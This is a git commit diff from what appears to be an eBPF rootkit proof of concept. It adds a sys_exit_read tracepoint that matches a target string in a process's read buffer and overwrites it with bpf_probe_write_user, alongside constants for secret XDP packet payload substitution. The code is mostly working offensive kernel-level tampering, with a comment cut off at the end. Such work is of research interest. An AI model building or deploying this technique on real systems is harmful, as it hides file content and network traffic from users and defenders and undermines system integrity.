Completed output modification of sys_read. Created a simple PoC

2025-12-16 15:23:07 +08:00 · 2022-01-16 06:45:45 -05:00
parent 99e9fd4277
commit fc0d30f06f
8 changed files with 1331 additions and 1291 deletions
--- a/.vscode/settings.json
+++ b/.vscode/settings.json
@@ -18,6 +18,7 @@
        "if_link.h": "c",
        "netlink.h": "c",
        "bpf_helper_defs.h": "c",
-        "bpf.h": "c"
+        "bpf.h": "c",
+        "stddef.h": "c"
    }
 }
--- a/src/.output/xdp_filter.bpf.o
+++ b/src/.output/xdp_filter.bpf.o
--- a/src/.output/xdp_filter.o
+++ b/src/.output/xdp_filter.o
--- a/src/.output/xdp_filter.skel.h
+++ b/src/.output/xdp_filter.skel.h
--- a/src/bin/xdp_filter
+++ b/src/bin/xdp_filter
--- a/src/common/constants.h
+++ b/src/common/constants.h
@@ -1,8 +1,13 @@
 #ifndef __CONSTANTS_H
 #define __CONSTANTS_H

+//XDP
 #define SECRET_PACKET_PAYLOAD "XDP_PoC_0"
 #define SECRET_PACKET_DEST_PORT 9000
 #define SUBSTITUTION_NEW_PAYLOAD "The previous message has been hidden ;)"

+//FS
+#define STRING_FS_HIDE "This won't be seen"
+#define STRING_FS_OVERWRITE "That is now hidden"
+
 #endif
--- a/src/ebpf/include/bpf/fs.h
+++ b/src/ebpf/include/bpf/fs.h
@@ -8,6 +8,7 @@
 #include <string.h>
 #include <linux/ptrace.h>
 #include <linux/stat.h>*/
+#include <ctype.h>

 #include <bpf/bpf_helpers.h>
 #include <bpf/bpf_tracing.h>
@@ -81,7 +82,7 @@ SEC("tracepoint/syscalls/sys_exit_read")
 int kretprobe_vfs_read(struct sys_read_exit_ctx *ctx){
    __u64 pid_tgid = bpf_get_current_pid_tgid();
    if(pid_tgid<0){
-        bpf_printk("Out\n");
+        //bpf_printk("Out\n");
        return -1;
    }
    //bpf_printk("OUT PID: %u\n", pid_tgid>>32);
@@ -89,48 +90,45 @@ int kretprobe_vfs_read(struct sys_read_exit_ctx *ctx){
    struct fs_open_data *data = (struct fs_open_data*) bpf_map_lookup_elem(&fs_open, &pid_tgid);
    if (data == NULL || data->buf == NULL){
        //Not found
-        bpf_printk("Not found\n");
+        //bpf_printk("Not found\n");
        return -1;
    }

    //Overwritting a byte of the buffer
    char *buf = data->buf;
    __u32 pid = data->pid;
-    char *msg = "OOOOOOOOOOOOO\0";
+    char msg_original[] = STRING_FS_HIDE;
+    char msg_overwrite[] = STRING_FS_OVERWRITE;
+    char c_buf[sizeof(msg_overwrite)] = {0};
    
    if(buf == NULL){
-        bpf_printk("Out\n");
        return -1;
    }
-
-    int length = 0;
-    char c[7] = {0};
-
-    while(length<6){
-        if(bpf_probe_read_user(c+length, 1, buf+length)<0){
+    
+#pragma unroll
+    for(int ii=0; ii<sizeof(msg_original)-1; ii++){
+        if(bpf_probe_read_user(c_buf+ii, 1, buf+ii)<0){
            //bpf_printk("Error reading\n");
            return -1;
        }
-        //bpf_printk("%i\n", length);
-        length++;
-    };
-    c[6] = '\0';
-
-    
-    for(int ii=0; ii<6; ii++){
-        if(!((c[ii] >= 'a' && c[ii] <= 'z') || (c[ii] >= 'A' && c[ii] <= 'Z'))){
-            //bpf_printk("Not a valid buf\n");
+        char c = (char)*(c_buf+ii);
+        
+        if( c != msg_original[ii]){
+            //Not the string we are looking for
+            //if(ii>0)bpf_printk("Discarded string, expected %i and received %i, %s\n", c, msg_original[ii], buf);
            return -1;
        }
+        if(c<32 || c>126){ //Not alphanumeric or symbol
+            //bpf_printk("Discarded string at pid cause c %u, %s\n", pid, buf);
+            return -1;
+        }
+        
    }

-
-
    bpf_printk("Overwritting at pid %u, %s\n", pid, buf);
-    if(bpf_probe_write_user((void*)buf, (void*)msg, (__u32)1)<0){
+    if(bpf_probe_write_user((void*)buf, (void*)msg_overwrite, (__u32)sizeof(msg_overwrite)-1)<0){
        bpf_printk("Error writing to user memory\n");
    }
-    bpf_printk("NEW at pid %u, %s\n", pid, buf);
    

    return 0;
--- a/src/ebpf/include/utils/strings.h
+++ b/src/ebpf/include/utils/strings.h
@@ -58,6 +58,11 @@ static __always_inline char* str_n_copy(char *dest, const char *src, int count){
 	return dest;
 }

+/**
+ * @brief Checks if string is a
+ * 
+ */
+